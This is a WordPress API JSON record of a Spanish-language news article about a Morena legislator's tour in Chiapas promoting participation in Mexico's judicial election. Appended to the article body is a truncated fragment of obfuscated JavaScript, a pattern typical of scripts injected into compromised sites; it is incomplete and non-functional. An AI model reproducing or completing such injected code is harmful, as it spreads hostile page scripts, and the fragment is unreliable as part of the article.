{"id":21846,"date":"2025-05-12T04:27:34","date_gmt":"2025-05-12T04:27:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21846"},"modified":"2025-05-12T04:27:35","modified_gmt":"2025-05-12T04:27:35","slug":"morena-impulsa-participacion-ciudadana-en-eleccion-judicial-historica-para-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21846","title":{"rendered":"Morena impulsa participaci\u00f3n ciudadana en elecci\u00f3n judicial hist\u00f3rica para Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020-1024x682.jpg\" alt=\"\" class=\"wp-image-21847\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250511-WA0020.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>11 de mayo del 2025. &#8211; En el marco de la campa\u00f1a para promover la elecci\u00f3n de integrantes del Poder Judicial Federal y local, Alfonso Garc\u00eda Cuellar, vicecoordinador de Morena en la C\u00e1mara de Diputados, inici\u00f3 una gira en Chiapas con visitas a Ocosingo y Palenque. El objetivo: incentivar la participaci\u00f3n de m\u00e1s de 700 mil chiapanecos en los comicios del pr\u00f3ximo 1 de julio, donde se elegir\u00e1n cargos clave para transformar el sistema de justicia en M\u00e9xico.<\/p>\n\n\n\n<p>&#8220;Justicia sin privilegios&#8221;: el llamado hist\u00f3rico<br>Garc\u00eda Cuellar record\u00f3 que este proceso es la culminaci\u00f3n de un anhelo que data de 1814: &#8220;Queremos un tribunal que defienda al pueblo cuando reclame con justicia. Necesitamos jueces y juezas honestos que protejan a los d\u00e9biles, no a los poderosos. La justicia no debe comprarse nunca m\u00e1s&#8221;, afirm\u00f3 en entrevista exclusiva.<\/p>\n\n\n\n<p>El legislador subray\u00f3 que, tras una resoluci\u00f3n del Tribunal Electoral, su partido ahora puede difundir informaci\u00f3n sobre los puestos en juego: &#8220;Tenemos 17 d\u00edas para intensificar la campa\u00f1a. Ning\u00fan ciudadano debe quedarse sin saber qu\u00e9 se elige el 1 de julio&#8221;. La meta nacional es superar los 25 millones de votantes.<\/p>\n\n\n\n<p>Reformas urgentes: Ministerio P\u00fablico y c\u00e1rceles<br>Entre las prioridades postelectorales, Garc\u00eda Cuellar destac\u00f3 tres ejes:<\/p>\n\n\n\n<p>&#8220;Una cirug\u00eda de caballo al Ministerio P\u00fablico&#8221;, donde la ciudadan\u00eda sufre &#8220;desd\u00e9n y humillaci\u00f3n&#8221;.<br>Fortalecer la Defensor\u00eda P\u00fablica: &#8220;Las personas humildes no tienen recursos para abogados privados. La defensa de oficio debe ser s\u00f3lida&#8221;.<br>Reforma al sistema penitenciario: &#8220;Las c\u00e1rceles deben formar, no castigar ni degradar&#8221;.<br>Cargos en disputa: estructura judicial<br>El proceso electoral definir\u00e1:<\/p>\n\n\n\n<p>Tribunal de Justicia de la Naci\u00f3n: 9 integrantes (5 ministras y 4 ministros).<br>Tribunal de Disciplina Judicial: 5 magistrados (3 mujeres, 2 hombres).<br>Sala Superior del Tribunal Electoral: 1 magistrado y 1 magistrada.<br>En Chiapas: 8 magistrados\/as de tribunales de circuito y 11 jueces\/as en materia laboral, civil y mixta del circuito judicial n\u00famero 20.<br>Hacia 2027: un Poder Judicial renovado<br>Garc\u00eda Cuellar confirm\u00f3 que este proceso es parte de una reestructuraci\u00f3n que concluir\u00e1 en 2027, cuando se consolide la elecci\u00f3n de todos los cargos judiciales federales y locales. &#8220;Es el primer paso para que la justicia sea un derecho, no un privilegio&#8221;, concluy\u00f3.<\/p>\n\n\n\n<p>Contexto local<br>En Chiapas, la campa\u00f1a busca combatir la desinformaci\u00f3n en zonas rurales y urbanas, donde persisten rezagos en acceso a justicia. Morena apuesta a movilizar a sus bases ante el desaf\u00edo de legitimar un sistema judicial hist\u00f3ricamente cuestionado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 11 de mayo del 2025. &#8211; En el marco de la campa\u00f1a para promover la elecci\u00f3n de integrantes del Poder Judicial Federal y local, Alfonso Garc\u00eda Cuellar, vicecoordinador de Morena en la C\u00e1mara de Diputados, inici\u00f3 una gira en Chiapas con visitas a Ocosingo y Palenque. El objetivo: incentivar la participaci\u00f3n de m\u00e1s &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21847,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21846","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21846","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21846"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21846\/revisions"}],"predecessor-version":[{"id":21848,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21846\/revisions\/21848"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21847"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21846"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21846"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21846"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}